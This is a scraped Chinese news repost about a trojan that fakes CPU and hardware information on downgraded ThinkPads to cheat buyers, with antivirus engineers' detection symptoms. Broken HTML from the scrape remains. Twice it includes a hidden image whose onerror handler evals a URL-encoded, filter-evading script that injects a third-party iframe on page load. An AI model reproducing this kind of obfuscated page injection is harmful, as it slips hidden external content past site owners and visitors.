奸商为牟利"定制"病毒Thinkpad CPU信息遭篡改- 银行信息- deification ...
奸商为牟利"定制"病毒 Thinkpad CPU信息遭篡改 [转贴 2010-02-11 21:43:08]   
奸商为牟利"定制"病毒 Thinkpad CPU信息遭篡改

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zw_468_60.html%20width%3D468%20height%3D60%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

11月17日消息,金山毒霸反病毒工程师截获了一款能够修改Thinkpad笔记本硬件配置信息的病毒——“奸商修改器”(Win32.troj.profiteer.271360)。该病毒是一个修改器程序,能对从Thinkpad T43开始到酷睿2时代T60之间的所有机型进行修改,让低配置的xx机甚至xx冒牌的机器,看上去和xx行货机的配置xx一样,欺骗消费者。

通过对该修改器的分析,反病毒工程师发现,该病毒极有可能是某些不法商人找病毒制作者“量身定制”。奸商们借助多种形式,将一些Thinkpad笔记本换“芯”,然后通过刷bios和利用此修改器来进行掩盖。被此修改器动过手脚的机器,无论是系统属性还是CPU信息,查看起来都是正常的。而由于笔记本在使用中,Intel的 Speedstep技术还会降频,因此在性能上也感觉不到多大差异。也就是说,用户很可能用了很长时间的Thinkpadxx,也不知道自己已经上当受骗。

据介绍,出现问题的笔记本有以下共性:

1.系统的%WINDOWS%system32\目录中都存在smssa.exe和smssb.exe两个进程,将它们强制关闭后,cpu频率会明显降低。

2.利用Bios工具进行查看,cpu数据显示正常,但其版本日期都为05年11月7日。

3.在smssa.Exe和smssb.Exe进程运行状态下,通过cpu-z等检测工具检测出来的值 都为修改后的值,且cpu信息那栏不停的闪动。

4.大多数问题都出现在xxThinkpad笔记本。

据了解,之前也曾出现过修改电脑配置数据的修改器,但大多数只是在装机初期进行安装,修改完后就会被删除。而此次发现的“奸商修改器”则是长期驻留在系统中,并且可以骗过大部分硬件配置查看工具的检查。因此,反病毒工程师认为它属于病毒木马的范畴,而不再仅仅是个普通的配置信息修改工具。

根据调查的情况,反病毒工程师强烈建议所有购买xx机、或者怀疑自己买到xx机的Thinkpad用户,立即对电脑进行检查,如果您已安装其它杀毒软件,不想卸载,也可以使用金山毒霸提供的免费修复工具“金山系统急救箱”来进行检查和修复。

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" alt="" src="http://photocdn.sohu.com/20081117/Img260677241.jpg" align=middle />

原始系统属性显示的真实信息

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" alt="" src="http://photocdn.sohu.com/20081117/Img260677242.jpg" align=middle />

修改后系统属性显示的假信息

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" alt="" src="http://photocdn.sohu.com/20081117/Img260677243.jpg" align=middle />

Cpu-z显示的真实信息

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" alt="" src="http://photocdn.sohu.com/20081117/Img260677244.jpg" align=middle />

Cpu-z显示的假信息

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" alt="" src="http://photocdn.sohu.com/20081117/Img260677245.jpg" align=middle styele="width:500px;" />

Bios的版本信息



0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zw_468_60.html%20width%3D468%20height%3D60%20frameBorder%3D0%20scrolling%3Dno%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml2%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

郑重声明:资讯 【奸商为牟利"定制"病毒Thinkpad CPU信息遭篡改- 银行信息- deification ...】由 发布,版权归原作者及其所在单位,其原创性以及文中陈述文字和内容未经(企业库qiyeku.com)证实,请读者仅作参考,并请自行核实相关内容。若本文有侵犯到您的版权, 请你提供相关证明及申请并与我们联系(qiyeku # qq.com)或【在线投诉】,我们审核后将会尽快处理。
—— 相关资讯 ——